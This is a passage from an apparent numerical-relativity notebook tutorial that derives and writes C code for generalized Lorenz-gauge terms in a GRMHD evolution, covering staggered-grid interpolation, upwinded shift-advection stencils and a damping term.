# \alpha_{i+1,j+1,k+1}
# }
# {8}\ .
# $$
#
# However, our algorithm is not restricted to using 8 points when performing such an average. For example, suppose we need the quantity $\left(A_{x}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}$, but we normally only have $\left(A_{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}$. The average algorithm would then be
#
# $$
# \left(A_{x}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} = \frac{\left(A_{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}} + \left(A_{x}\right)_{i+1,j+\frac{1}{2},k+\frac{1}{2}}}{2}\ .
# $$
# <a id='interp_and_alpha_phi_minus_betaj_A_j'></a>
#
# ### Step 1.a.ii: Interpolating gridfunctions and computing $\left(\alpha\Phi-\beta^{j}A_{j}\right)$ \[Back to [top](#toc)\]
# $$\label{interp_and_alpha_phi_minus_betaj_A_j}$$
#
# Now, to compute $\partial_{j}\left(\alpha\psi^{6}A^{j}\right)$ we need different interpolations for different quantities. We will focus on the $x$-direction to give a concrete example.
#
# Consider, then, the term
#
# $$
# \partial_{x}\left(\alpha\psi^{6}A^{x}\right)\ .
# $$
#
# As we know, the second-order, centered finite differences approximation of this equation is
#
# $$
# \left[\partial_{x}\left(\alpha\psi^{6}A^{x}\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} = \frac{\left(\alpha\psi^{6}A^{x}\right)_{i+1,j+\frac{1}{2},k+\frac{1}{2}} - \left(\alpha\psi^{6}A^{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}}{dx}\ ,
# $$
#
# where the subscripts indicate ***the actual gridpoint location***. The $A_{x}$ staggering, then, already makes it available at the needed points for the derivative. However, we need to compute $A^{x} = g^{xi}A_{i} = \gamma^{xx}A_{x} + \gamma^{xy}A_{y} + \gamma^{xz}A_{z}$, which means that to compute $A^{x}$ alone we need to interpolate $\left(\gamma^{xx},\gamma^{xy},\gamma^{xz},A_{y},A_{z}\right)$ to the grid locations $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$ and $\left(i+1,j+\frac{1}{2},k+\frac{1}{2}\right)$. On top of that, to be able to compute the derivative, we also need $\alpha$ and $\psi^{6}$ at those locations. Finally, once all interpolations have been performed, we can then add the appropriate terms to the RHSs of $\partial_{t}\left[\sqrt{\gamma}\Phi\right]$ and $\partial_{t}A_{i}$.
#
# The outline of the algorithm is as follows:
#
# 1. Read in gridfunctions at point $(i,j,k)$ and points around that, so that we can perform interpolations.
# 1. Interpolate $\alpha$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$
# 1. $A^{x}$ term:
# 1. Interpolate $\bar{\gamma}^{xx},\bar{\gamma}^{xy},\bar{\gamma}^{xz},\alpha,\psi$ to the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Interpolate $A_{x}$, $A_{y}$, $A_{z}$ to the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Compute $A^{x}$ at the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Compute $\alpha\psi^{6}A^{x}$ at the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. $A^{y}$ term:
# 1. Interpolate $\bar{\gamma}^{xy},\bar{\gamma}^{yy},\bar{\gamma}^{yz},\alpha,\psi$ to the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. Interpolate $A_{x}$, $A_{y}$, $A_{z}$ to the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. Compute $A^{y}$ at the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. Compute $\alpha\psi^{6}A^{y}$ at the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. $A^{z}$ term:
# 1. Interpolate $\bar{\gamma}^{xz},\bar{\gamma}^{yz},\bar{\gamma}^{zz},\alpha,\psi$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Interpolate $A_{x}$, $A_{y}$, $A_{z}$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Compute $A^{z}$ at the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Compute $\alpha\psi^{6}A^{z}$ at the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Interpolate $A_{x},A_{y},A_{z}$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Interpolate $\beta^{x},\beta^{y},\beta^{z}$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Compute $\left(\alpha\Phi-\beta^{j}A_{j}\right)$ at $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$.
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// The stencil here is {-1,1},{-1,1},{-1,1} for x,y,z directions, respectively.
// Note that ALL input variables are defined at ALL gridpoints, so no
// worries about ghostzones.
#pragma omp parallel for
for(int k=1;k<cctk_lsh[2]-1;k++) for(int j=1;j<cctk_lsh[1]-1;j++) for(int i=1;i<cctk_lsh[0]-1;i++) {
int index=CCTK_GFINDEX3D(cctkGH,i,j,k);
// Per-point scratch buffer: one small stencil sub-block per interpolated variable,
// indexed as INTERP_VARS[variable][kk][jj][ii].
CCTK_REAL INTERP_VARS[MAXNUMINTERP][PLUS2+1][PLUS2+1][PLUS2+1];
// First compute \partial_j \alpha \sqrt{\gamma} A^j (RHS of \partial_i psi6phi)
// FIXME: Would be much cheaper & easier to unstagger A_i, raise, then interpolate A^i.
// However, we keep it this way to be completely compatible with the original
// Illinois GRMHD thorn, called mhd_evolve.
//
//Step 1) j=x: Need to raise A_i, but to do that, we must have all variables at the same gridpoints:
// The goal is to compute \partial_j (\alpha \sqrt{\gamma} A^j) at (i+1/2,j+1/2,k+1/2)
// We do this by first interpolating (RHS1x) = (\alpha \sqrt{\gamma} A^x) at
// (i,j+1/2,k+1/2)and (i+1,j+1/2,k+1/2), then taking \partial_x (RHS1x) =
// [ RHS1x(i+1,j+1/2,k+1/2) - RHS1x(i,j+1/2,k+1/2) ]/dX.
// First bring gup's, psi, and alpha to (i,j+1/2,k+1/2):
int num_vars_to_interp;
int vars_to_interpolate[MAXNUMINTERP] = {INTERP_GAMMATILDEUPXX,INTERP_GAMMATILDEUPXY,INTERP_GAMMATILDEUPXZ,INTERP_GAMMATILDEUPYY,INTERP_GAMMATILDEUPYZ,INTERP_GAMMATILDEUPZZ,INTERP_LAPM1,INTERP_PSI,INTERP_SHIFTX,INTERP_SHIFTY,INTERP_SHIFTZ};
num_vars_to_interp = 11;
// We may set interp_limits to be more general than we need.
int interp_limits[6] = {-1,1,-1,1,-1,1}; SET_INDEX_ARRAYS_3DBLOCK(interp_limits);
//SET_INDEX_ARRAYS_3DBLOCK(interp_limits);
for(int ww=0;ww<num_vars_to_interp;ww++) {
int whichvar=vars_to_interpolate[ww];
// Read in variable at interp. stencil points from main memory, store in INTERP_VARS.
for(int kk=PLUS0;kk<=PLUS1;kk++) for(int jj=PLUS0;jj<=PLUS1;jj++) for(int ii=PLUS0;ii<=PLUS1;ii++) {
INTERP_VARS[whichvar][kk][jj][ii] = in_vars[whichvar][index_arr_3DB[kk][jj][ii]]; }
}
// Next set \alpha at (i+1/2,j+1/2,k+1/2). Will come in handy when computing damping term later.
// (INTERP_LAPM1 stores alpha-1, hence the +1.0.)
alpha_iphjphkph[index] = avg(INTERP_VARS[INTERP_LAPM1] , PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1)+1.0;
//A_x needs a stencil s.t. interp_limits={0,1,-1,1,-1,1}:
for(int kk=MINUS1;kk<=PLUS1;kk++) for(int jj=MINUS1;jj<=PLUS1;jj++) for(int ii=PLUS0;ii<=PLUS1;ii++) {
INTERP_VARS[INTERP_AX][kk][jj][ii] = in_vars[INTERP_AX][index_arr_3DB[kk][jj][ii]]; }
//A_y needs a stencil s.t. interp_limits={-1,1,0,1,-1,1}:
for(int kk=MINUS1;kk<=PLUS1;kk++) for(int jj=PLUS0;jj<=PLUS1;jj++) for(int ii=MINUS1;ii<=PLUS1;ii++) {
INTERP_VARS[INTERP_AY][kk][jj][ii] = in_vars[INTERP_AY][index_arr_3DB[kk][jj][ii]]; }
//A_z needs a stencil s.t. interp_limits={-1,1,-1,1,0,1}:
for(int kk=PLUS0;kk<=PLUS1;kk++) for(int jj=MINUS1;jj<=PLUS1;jj++) for(int ii=MINUS1;ii<=PLUS1;ii++) {
INTERP_VARS[INTERP_AZ][kk][jj][ii] = in_vars[INTERP_AZ][index_arr_3DB[kk][jj][ii]]; }
// FIRST DO A^X TERM (interpolate to (i,j+1/2,k+1/2) )
// \alpha \sqrt{\gamma} A^x = \alpha psi^6 A^x (RHS of \partial_i psi6phi)
// Note that gupij is \tilde{\gamma}^{ij}, so we need to multiply by \psi^{-4}.
CCTK_REAL gupxx_jphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXX], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL gupxy_jphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXY], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL gupxz_jphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXZ], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
// Build alpha*Psi2 and alpha/Psi2^3 at every stencil point, where
// Psi2 = (INTERP_PSI value)^2; these combinations are averaged below.
for(int kk=PLUS0;kk<=PLUS1;kk++) for(int jj=PLUS0;jj<=PLUS1;jj++) for(int ii=PLUS0;ii<=PLUS1;ii++) {
CCTK_REAL Psi2 = INTERP_VARS[INTERP_PSI][kk][jj][ii]*INTERP_VARS[INTERP_PSI][kk][jj][ii];
CCTK_REAL alpha = INTERP_VARS[INTERP_LAPM1][kk][jj][ii]+1.0;
INTERP_VARS[INTERP_LAPSE_PSI2][kk][jj][ii]=alpha*Psi2;
INTERP_VARS[INTERP_LAPSE_OVER_PSI6][kk][jj][ii]=alpha/(Psi2*Psi2*Psi2);
}
CCTK_REAL lapse_Psi2_jphkph = avg(INTERP_VARS[INTERP_LAPSE_PSI2], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL A_x_jphkph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_jphkph = avg(INTERP_VARS[INTERP_AY],MINUS1,PLUS0, PLUS0,PLUS1, PLUS0,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_jphkph = avg(INTERP_VARS[INTERP_AZ],MINUS1,PLUS0, PLUS0,PLUS0, PLUS0,PLUS1); // @ (i+1/2,j+1/2,k)
alpha_sqrtg_Ax_interp[index] = lapse_Psi2_jphkph*
( gupxx_jphkph*A_x_jphkph + gupxy_jphkph*A_y_jphkph + gupxz_jphkph*A_z_jphkph );
// DO A^Y TERM (interpolate to (i+1/2,j,k+1/2) )
// \alpha \sqrt{\gamma} A^y = \alpha psi^6 A^y (RHS of \partial_i psi6phi)
// Note that gupij is \tilde{\gamma}^{ij}, so we need to multiply by \psi^{-4}.
CCTK_REAL gupxy_iphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXY], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL gupyy_iphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPYY], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL gupyz_iphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPYZ], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL lapse_Psi2_iphkph = avg(INTERP_VARS[INTERP_LAPSE_PSI2], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
//CCTK_REAL lapse_iphkph = avg(INTERP_VARS[INTERP_LAPM1], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1)+1.0;
//CCTK_REAL psi_iphkph = avg(INTERP_VARS[INTERP_PSI ], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL A_x_iphkph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS1,MINUS1,PLUS0, PLUS0,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_iphkph = avg(INTERP_VARS[INTERP_AY], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_iphkph = avg(INTERP_VARS[INTERP_AZ], PLUS0,PLUS0,MINUS1,PLUS0, PLUS0,PLUS1); // @ (i+1/2,j+1/2,k)
alpha_sqrtg_Ay_interp[index] = lapse_Psi2_iphkph*
( gupxy_iphkph*A_x_iphkph + gupyy_iphkph*A_y_iphkph + gupyz_iphkph*A_z_iphkph );
// DO A^Z TERM (interpolate to (i+1/2,j+1/2,k) )
// \alpha \sqrt{\gamma} A^z = \alpha psi^6 A^z (RHS of \partial_i psi6phi)
// Note that gupij is \tilde{\gamma}^{ij}, so we need to multiply by \psi^{-4}.
CCTK_REAL gupxz_iphjph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL gupyz_iphjph = avg(INTERP_VARS[INTERP_GAMMATILDEUPYZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL gupzz_iphjph = avg(INTERP_VARS[INTERP_GAMMATILDEUPZZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
//CCTK_REAL lapse_iphjph = avg(INTERP_VARS[INTERP_LAPM1], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0)+1.0;
//CCTK_REAL psi_iphjph = avg(INTERP_VARS[INTERP_PSI ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL lapse_Psi2_iphjph = avg(INTERP_VARS[INTERP_LAPSE_PSI2], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL A_x_iphjph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS1, PLUS0,PLUS0,MINUS1,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_iphjph = avg(INTERP_VARS[INTERP_AY], PLUS0,PLUS0, PLUS0,PLUS1,MINUS1,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_iphjph = avg(INTERP_VARS[INTERP_AZ], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i+1/2,j+1/2,k)
alpha_sqrtg_Az_interp[index] = lapse_Psi2_iphjph*
( gupxz_iphjph*A_x_iphjph + gupyz_iphjph*A_y_iphjph + gupzz_iphjph*A_z_iphjph );
// Next set \alpha \Phi - \beta^j A_j at (i+1/2,j+1/2,k+1/2):
// We add a "L" suffix to shifti_iphjphkph to denote "LOCAL", as we set
// shifti_iphjphkph[] gridfunction below.
CCTK_REAL shiftx_iphjphkphL = avg(INTERP_VARS[INTERP_SHIFTX], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL shifty_iphjphkphL = avg(INTERP_VARS[INTERP_SHIFTY], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL shiftz_iphjphkphL = avg(INTERP_VARS[INTERP_SHIFTZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL lapse_over_Psi6_iphjphkphL = avg(INTERP_VARS[INTERP_LAPSE_OVER_PSI6], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
//CCTK_REAL psi_iphjphkph = avg(INTERP_VARS[INTERP_PSI ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
//CCTK_REAL psi2_iphjphkph= psi_iphjphkph*psi_iphjphkph;
//CCTK_REAL psi6_iphjphkph= psi2_iphjphkph*psi2_iphjphkph*psi2_iphjphkph;
CCTK_REAL A_x_iphjphkph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_iphjphkph = avg(INTERP_VARS[INTERP_AY], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_iphjphkph = avg(INTERP_VARS[INTERP_AZ], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS1); // @ (i+1/2,j+1/2,k)
// alpha*Phi = psi6phi * (alpha/psi^6), since psi6phi stores sqrt(gamma)*Phi = psi^6 Phi.
alpha_Phi_minus_betaj_A_j_iphjphkph[index] = psi6phi[index]*lapse_over_Psi6_iphjphkphL
- (shiftx_iphjphkphL*A_x_iphjphkph + shifty_iphjphkphL*A_y_iphjphkph + shiftz_iphjphkphL*A_z_iphjphkph);
// Finally, save shifti_iphjphkph, for \partial_j \beta^j psi6phi
shiftx_iphjphkph[index]=shiftx_iphjphkphL;
shifty_iphjphkph[index]=shifty_iphjphkphL;
shiftz_iphjphkph[index]=shiftz_iphjphkphL;
}
# <a id='partial_t_a_i_gauge'></a>
#
# ### Step 1.b: Computing $\partial_{t}A_{i}^{\rm gauge}$ \[Back to [top](#toc)\]
# $$\label{partial_t_a_i_gauge}$$
#
# Now that we have access to the gridfunctions at all the necessary gridpoints, we proceed to the computation of the gauge terms in $\partial_{t}A_{i}$, i.e.
#
# $$
# \partial_{t}A_{i}^{\rm gauge} = -\partial_{i}\left(\alpha\Phi-\beta^{j}A_{j}\right)\ ,
# $$
#
# or, more explicitly:
#
# $$
# \begin{align}
# \left(\partial_{t}A_{x}^{\rm gauge}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}
# &=
# \frac{
# \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i-\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} - \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }{dx}\ ,\\
# \left(\partial_{t}A_{y}^{\rm gauge}\right)_{i+\frac{1}{2},j,k+\frac{1}{2}}
# &=
# \frac{
# \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j-\frac{1}{2},k+\frac{1}{2}} - \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }{dy}\ ,\\
# \left(\partial_{t}A_{z}^{\rm gauge}\right)_{i+\frac{1}{2},j+\frac{1}{2},k}
# &=
# \frac{
# \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k-\frac{1}{2}} - \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }{dz}\ .
# \end{align}
# $$
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// This loop requires two additional ghostzones in every direction. Hence the following loop definition:
// NOTE: this opening brace is closed in a later %%writefile -a cell; the loop
// body continues with the shift-advection and divergence terms below.
#pragma omp parallel for
for(int k=cctk_nghostzones[2];k<cctk_lsh[2]-cctk_nghostzones[2];k++) for(int j=cctk_nghostzones[1];j<cctk_lsh[1]-cctk_nghostzones[1];j++) for(int i=cctk_nghostzones[0];i<cctk_lsh[0]-cctk_nghostzones[0];i++) {
int index = CCTK_GFINDEX3D(cctkGH,i,j,k);
// \partial_t A_i = [reconstructed stuff] + [gauge stuff],
// where [gauge stuff] = -\partial_i (\alpha \Phi - \beta^j A_j)
CCTK_REAL alpha_Phi_minus_betaj_A_j_iphjphkphL = alpha_Phi_minus_betaj_A_j_iphjphkph[index];
// - partial_i -> - (A_{i} - A_{i-1})/dX = (A_{i-1} - A_{i})/dX, for Ax
Ax_rhs[index] += dXm1*(alpha_Phi_minus_betaj_A_j_iphjphkph[CCTK_GFINDEX3D(cctkGH,i-1,j,k)] - alpha_Phi_minus_betaj_A_j_iphjphkphL);
Ay_rhs[index] += dYm1*(alpha_Phi_minus_betaj_A_j_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j-1,k)] - alpha_Phi_minus_betaj_A_j_iphjphkphL);
Az_rhs[index] += dZm1*(alpha_Phi_minus_betaj_A_j_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k-1)] - alpha_Phi_minus_betaj_A_j_iphjphkphL);
# <a id='shift_advection_terms'></a>
#
# ### Step 1.c: Computing $\partial_{j}\beta^{j}\left[\sqrt{\gamma}\Phi\right]$ \[Back to [top](#toc)\]
# $$\label{shift_advection_terms}$$
#
# We now compute the shift-advection terms, $\partial_{j}\beta^{j}\left[\sqrt{\gamma}\Phi\right]$. For these terms we use [forwards/backwards finite difference stencils](https://en.wikipedia.org/wiki/Finite_difference_coefficient). The sign of $\beta^{i}$ determines whether we will use forwards or backwards finite difference, according to the following criterion:
#
# | $\beta^{i}$ | Finite difference |
# |:-----------:|:-----------------:|
# | $>0$ | Backward |
# | $<0$ | Forward |
#
# For example, assume $\beta^{x}<0$. Then the term which contains the derivative in the $x$-direction would read
#
# $$
# \left[\partial_{x}\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} =
# \frac{
# \left[\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} -
# 4\left[\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i-\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} +
# 3\left[\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i-\frac{3}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }
# {2dx}\ .
# $$
#
# Similarly, if $\beta^{y}>0$, then the term which contains the derivative in the $y$-direction would read
#
# $$
# \left[\partial_{y}\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} =
# \frac{
# -3\left[\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} +
# 4\left[\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{3}{2},k+\frac{1}{2}} -
# \left[\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{5}{2},k+\frac{1}{2}}
# }
# {2dy}\ .
# $$
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// \partial_t psi6phi = [shift advection term] + \partial_j (\alpha \sqrt{\gamma} A^j)
// Here we compute [shift advection term] = \partial_j (\beta^j psi6phi)
// Cache misses are likely more expensive than branch mispredictions here,
// which is why we use if() statements and array lookups inside the if()'s.
// Each derivative is upwinded on the sign of the shift: a one-sided,
// second-order stencil toward i-2..i (beta<0) or i..i+2 (beta>=0).
CCTK_REAL psi6phi_rhsL=0.0;
CCTK_REAL psi6phiL=psi6phi[index];
CCTK_REAL shiftx_iphjphkphL=shiftx_iphjphkph[index];
CCTK_REAL shifty_iphjphkphL=shifty_iphjphkph[index];
CCTK_REAL shiftz_iphjphkphL=shiftz_iphjphkph[index];
// \partial_x (\beta^x psi6phi) :
if(shiftx_iphjphkphL < 0.0) {
psi6phi_rhsL+=0.5*dXm1*(+ shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i-2,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i-2,j,k)]
-4.0*shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i-1,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i-1,j,k)]
+3.0*shiftx_iphjphkphL* psi6phiL);
} else {
psi6phi_rhsL+=0.5*dXm1*(- shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i+2,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i+2,j,k)]
+4.0*shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i+1,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i+1,j,k)]
-3.0*shiftx_iphjphkphL* psi6phiL);
}
// \partial_y (\beta^y psi6phi) :
if(shifty_iphjphkphL < 0.0) {
psi6phi_rhsL+=0.5*dYm1*(+ shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j-2,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j-2,k)]
-4.0*shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j-1,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j-1,k)]
+3.0*shifty_iphjphkphL* psi6phiL);
} else {
psi6phi_rhsL+=0.5*dYm1*(- shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j+2,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j+2,k)]
+4.0*shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j+1,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j+1,k)]
-3.0*shifty_iphjphkphL* psi6phiL);
}
// \partial_z (\beta^z psi6phi) :
if(shiftz_iphjphkphL < 0.0) {
psi6phi_rhsL+=0.5*dZm1*(+ shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k-2)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k-2)]
-4.0*shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k-1)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k-1)]
+3.0*shiftz_iphjphkphL* psi6phiL);
} else {
psi6phi_rhsL+=0.5*dZm1*(- shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k+2)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k+2)]
+4.0*shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k+1)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k+1)]
-3.0*shiftz_iphjphkphL* psi6phiL);
}
# <a id='partial_j_alpha_psi6_aj'></a>
#
# ### Step 1.d: Computing $-\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)-\xi\alpha\left[\sqrt{\gamma}\Phi\right]$ \[Back to [top](#toc)\]
# $$\label{partial_j_alpha_psi6_aj}$$
#
# Now we have the simple task of computing the remaining terms on the RHS of $\partial_{t}\left[\sqrt{\gamma}\Phi\right]$. For the derivative term, $\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)$, we can now use ordinary centered finite differences:
#
# $$
# \begin{align}
# -\left[\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# &= \frac{\left(\alpha\sqrt{\gamma}A^{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}-\left(\alpha\sqrt{\gamma}A^{x}\right)_{i+1,j+\frac{1}{2},k+\frac{1}{2}}}{dx} \\
# &+ \frac{\left(\alpha\sqrt{\gamma}A^{y}\right)_{i+\frac{1}{2},j,k+\frac{1}{2}}-\left(\alpha\sqrt{\gamma}A^{y}\right)_{i+\frac{1}{2},j+1,k+\frac{1}{2}}}{dy} \\
# &+ \frac{\left(\alpha\sqrt{\gamma}A^{z}\right)_{i+\frac{1}{2},j+\frac{1}{2},k}-\left(\alpha\sqrt{\gamma}A^{z}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+1}}{dz}
# \end{align}
# $$
#
# The [*generalized Lorenz gauge*](https://arxiv.org/pdf/1207.3354.pdf) term, $\xi\alpha\left[\sqrt{\gamma}\Phi\right]$, is then trivially implemented.
#
# +
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// Next we add \partial_j (\alpha \sqrt{\gamma} A^j) to \partial_t psi6phi:
psi6phi_rhsL+=dXm1*(alpha_sqrtg_Ax_interp[index] - alpha_sqrtg_Ax_interp[CCTK_GFINDEX3D(cctkGH,i+1,j,k)])
+ dYm1*(alpha_sqrtg_Ay_interp[index] - alpha_sqrtg_Ay_interp[CCTK_GFINDEX3D(cctkGH,i,j+1,k)])
+ dZm1*(alpha_sqrtg_Az_interp[index] - alpha_sqrtg_Az_interp[CCTK_GFINDEX3D(cctkGH,i,j,k+1)]);
// *GENERALIZED* LORENZ GAUGE:
// Finally, add damping factor to \partial_t psi6phi
//subtract lambda * alpha psi^6 Phi
psi6phi_rhsL+=-damp_lorenz*alpha_iphjphkph[index]*psi6phiL;
psi6phi_rhs[index] = psi6phi_rhsL;
}
}
# -
# <a id='fct_avg'></a>
#
# ### Step 1.e: The `avg()` function \[Back to [top](#toc)\]
# $$\label{fct_avg}$$
#
# This is the implementation of the algorithm we discussed in [step 1.a.i](#interpolation_algorithm).
# +
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// Return the arithmetic mean of f over the inclusive index box
// [imin,imax] x [jmin,jmax] x [kmin,kmax]. Note the reversed index
// order: f is addressed as f[k][j][i]. Used by the staggered-grid
// interpolation described in Step 1.a.i of this tutorial.
